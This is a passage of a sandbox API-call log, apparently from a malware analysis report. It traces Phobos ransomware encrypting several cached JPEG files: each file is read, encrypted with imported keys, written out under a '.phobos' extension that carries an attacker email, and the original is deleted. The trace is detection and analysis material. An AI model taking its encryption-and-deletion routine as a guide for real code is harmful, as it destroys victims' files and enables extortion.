files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.516] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.516] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.517] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.517] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.517] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5a45, lpOverlapped=0x0) returned 1 [0179.527] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5a50, dwBufLen=0x5a50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5a50) returned 1 [0179.527] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5a50, lpOverlapped=0x0) returned 1 [0179.528] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0179.528] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.528] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.528] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0179.528] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.529] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.529] CloseHandle (hObject=0x15c) returned 1 [0179.529] CloseHandle (hObject=0x17c) returned 1 [0179.529] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIl2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegil2[1].jpg")) returned 1 [0179.530] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.531] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=7831) returned 1 [0179.531] CloseHandle (hObject=0x17c) returned 1 [0179.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg")) returned 0x2020 [0179.531] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.531] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.532] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.532] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.532] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.532] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1e97, lpOverlapped=0x0) returned 1 [0179.539] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1ea0, dwBufLen=0x1ea0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x1ea0) returned 1 [0179.539] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x1ea0, lpOverlapped=0x0) returned 1 [0179.541] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0179.541] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.541] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.541] CryptDestroyKey (hKey=0xa32d28) returned 1 [0179.541] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.541] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.541] CloseHandle (hObject=0x17c) returned 1 [0179.541] CloseHandle (hObject=0x15c) returned 1 [0179.541] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgIyL[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegiyl[1].jpg")) returned 1 [0179.542] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.542] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9151) returned 1 [0179.542] CloseHandle (hObject=0x15c) returned 1 [0179.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg")) returned 0x2020 [0179.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.543] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.543] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.543] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.543] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.543] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x23bf, lpOverlapped=0x0) returned 1 [0179.568] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x23c0, dwBufLen=0x23c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x23c0) returned 1 [0179.568] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x23c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x23c0, lpOverlapped=0x0) returned 1 [0179.569] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.569] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.569] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.569] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.569] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.569] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.569] CloseHandle (hObject=0x15c) returned 1 [0179.569] CloseHandle (hObject=0x17c) returned 1 [0179.569] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgkY6[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegky6[1].jpg")) returned 1 [0179.570] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.571] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11149) returned 1 [0179.571] CloseHandle (hObject=0x17c) returned 1 [0179.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg")) returned 0x2020 [0179.571] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.571] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.572] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.572] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.572] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.572] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b8d, lpOverlapped=0x0) returned 1 [0179.594] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b90, dwBufLen=0x2b90 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2b90) returned 1 [0179.594] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2b90, lpOverlapped=0x0) returned 1 [0179.595] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.595] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.595] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.595] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.595] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.595] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.595] CloseHandle (hObject=0x17c) returned 1 [0179.595] CloseHandle (hObject=0x15c) returned 1 [0179.595] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgUri[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeguri[1].jpg")) returned 1 [0179.596] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.616] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1769) returned 1 [0179.616] CloseHandle (hObject=0x15c) returned 1 [0179.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg")) returned 0x2020 [0179.616] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.616] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.616] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEgZME[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbegzme[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.616] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.616] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.616] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x6e9, lpOverlapped=0x0) returned 1 [0179.648] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x6f0) returned 1 [0179.648] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x6f0, lpOverlapped=0x0) returned 1 [0179.655] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0179.655] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.655] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.655] CryptDestroyKey (hKey=0xa32de8) returned 1 [0179.655] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, 